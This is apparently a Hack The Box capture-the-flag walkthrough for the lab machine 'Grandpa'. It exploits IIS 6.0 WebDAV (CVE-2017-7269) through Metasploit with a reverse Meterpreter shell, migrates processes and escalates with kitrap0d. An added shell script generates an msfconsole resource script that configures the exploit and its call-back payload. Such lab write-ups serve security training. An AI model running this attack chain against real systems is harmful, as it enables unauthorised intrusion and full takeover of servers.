Hack The Box – Grandpa

Greetings everyone!

We’re back with another Hack The Box walkthrough; this one is called Grandpa. So without further ado, let’s jump right into it!

The machine Grandpa has the IP 10.10.10.14, so let’s get started with an Nmap scan.

As the results show, we don't have much to go on: only port 80 is open, and the banner identifies the web service as Microsoft IIS httpd 6.0. Let's browse to http://10.10.10.14 and see if there's anything useful!

Here we are greeted with the default “under construction” portal. I ran a couple of enumeration scripts for directory brute forcing, but nothing came up. So let’s fire up Metasploit and search for IIS!

After a bit of research and some trial and error, the exploit we'll be using is the "scstoragepathfromurl" module (exploit/windows/iis/iis_webdav_scstoragepathfromurl). It targets CVE-2017-7269, a buffer overflow in the ScStoragePathFromUrl function of the IIS 6.0 WebDAV service, so it only works when WebDAV is enabled on the target (an OPTIONS request that returns a DAV header, or lists PROPFIND in Allow, confirms that):


We'll need to set RHOSTS to the target IP and choose an appropriate payload. With a reverse Meterpreter payload, LHOST must also be an address the target can actually reach:

Once we have our settings in order, let’s run the exploit!


Meterpreter session achieved! Now let's try the simple getsystem command to escalate straight to NT AUTHORITY\SYSTEM.

Well, I guess that would have been too easy! So instead we're going to run the local exploit suggester to see which privilege-escalation exploits might work. Before that, though, we migrate into another process running as NT AUTHORITY\NETWORK SERVICE: the token of the process the exploit landed us in is typically too restricted for post modules, which fail with access-denied errors from inside it. Start by listing the processes with the ps command.

As we can see, we migrated successfully to process 1816, which runs as NT AUTHORITY\NETWORK SERVICE. The getuid command confirms we are now NT AUTHORITY\NETWORK SERVICE. Awesome! Let's run the exploit suggester (post/multi/recon/local_exploit_suggester) now:

We may as well start with the first suggestion: kitrap0d (exploit/windows/local/ms10_015_kitrap0d, MS10-015 / CVE-2010-0232). Let's background the session, go back to the msfconsole prompt, and use the exploit!

Uh oh. As we can see, the exploit completed but no session was created. Let's run show options to find out why we didn't get a session.

Ah ha! LHOST was set to the IP of our virtual machine's local network interface, which the target can't reach, so the new reverse shell had nowhere to connect back to. Setting it to the IP of our VPN interface (tun0 on a typical HTB setup) and running the exploit again gave us a new session!
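The pre-flight checks for the procedure above, as an added example that is not part of the original walkthrough and not Metasploit's own code: confirm WebDAV is on before firing the IIS exploit, pick LHOST from the VPN interface rather than the VM's LAN address, pick a migration target from Meterpreter's ps listing, and write an msfconsole resource script that sets LHOST globally so the later kitrap0d run inherits the right address. The OPTIONS response, the ip output, the ps listing, the attacker address 10.10.14.5 and the process names are all constructed samples.

```shell
#!/bin/sh
# Added example for this walkthrough (not code from the original post or from
# Metasploit). All sample command outputs and the attacker IP are constructed.

# --- 1. Confirm WebDAV is on before using iis_webdav_scstoragepathfromurl.
# stdin = response headers of `curl -si -X OPTIONS http://10.10.10.14/`.
# Exits 0 when the server advertises DAV or allows PROPFIND.
webdav_enabled() {
    grep -Eiq '^(DAV:|Allow:.*PROPFIND)'
}

# Constructed OPTIONS response, shaped like IIS 6.0 with WebDAV enabled.
SAMPLE_OPTIONS='HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
DAV: 1, 2
Server: Microsoft-IIS/6.0'

# --- 2. Pick LHOST from the VPN interface, not the VM's LAN address.
# stdin = output of `ip -4 -o addr show`; $1 = interface name (tun0 on HTB).
lhost_for_iface() {
    awk -v ifc="$1" '$2 == ifc { split($4, a, "/"); print a[1]; exit }'
}

# Constructed `ip -4 -o addr show` output: LAN address on eth0, VPN on tun0.
SAMPLE_IP_ADDR='1: lo    inet 127.0.0.1/8 scope host lo\       valid_lft forever preferred_lft forever
2: eth0    inet 192.168.56.101/24 brd 192.168.56.255 scope global eth0\       valid_lft forever preferred_lft forever
3: tun0    inet 10.10.14.5/23 scope global tun0\       valid_lft forever preferred_lft forever'

# --- 3. Pick a migration target from Meterpreter `ps` output.
# $1 = owning user as a fixed string, $2 = image name; prints the PID.
# grep -F keeps the backslash in "NT AUTHORITY\NETWORK SERVICE" literal
# (awk -v would mangle it as an escape sequence).
migrate_target_pid() {
    grep -F -- "$1" | awk -v name="$2" '$3 == name { print $1; exit }'
}

# Constructed `ps` listing: the IIS worker (w3wp.exe) is where the exploit
# lands us; wmiprvse.exe is a second process owned by the same account.
SAMPLE_PS=' PID   PPID  Name           Arch  Session  User                          Path
 ---   ----  ----           ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 1816  656   wmiprvse.exe   x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2772  656   w3wp.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe'

# --- 4. Emit a resource script. `setg` makes LHOST global, so the later
# ms10_015_kitrap0d local exploit inherits the VPN address instead of the
# VM's LAN address (the cause of "Exploit completed, but no session was created").
write_rc() {   # $1 = RHOSTS, $2 = LHOST, $3 = output path
    cat > "$3" <<EOF
setg LHOST $2
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set RHOSTS $1
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
exploit -j -z
EOF
}

# Stand-alone demonstration against the constructed samples.
if printf '%s\n' "$SAMPLE_OPTIONS" | webdav_enabled; then
    echo "WebDAV looks enabled: proceed with iis_webdav_scstoragepathfromurl"
fi
LHOST=$(printf '%s\n' "$SAMPLE_IP_ADDR" | lhost_for_iface tun0)
TARGET_PID=$(printf '%s\n' "$SAMPLE_PS" | migrate_target_pid 'NT AUTHORITY\NETWORK SERVICE' wmiprvse.exe)
echo "LHOST=$LHOST  migrate target pid=$TARGET_PID"
write_rc 10.10.10.14 "$LHOST" "${TMPDIR:-/tmp}/grandpa.rc"
```

Load the generated file with msfconsole -r, and once the session is back, migrate to the chosen PID and run the local exploit from the same console so the global LHOST is still in effect; only SESSION and a distinct LPORT need setting for kitrap0d.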

Now that we have a session with escalated privileges (kitrap0d lands us as NT AUTHORITY\SYSTEM), let's start hunting for flags! The user flag was found under the account "Harry":

And, in a surprising turn of events (not really), the root flag was found under the Administrator account:

And just like that, we were able to grab the two flags! I did experience a little bit of trouble on this machine, in the sense that my shell kept kicking me back out to the Meterpreter session. So I had to keep establishing a new shell and very quickly find the flags to upload to HTB. All in all, a pretty easy box but still very fun!

Thanks for reading!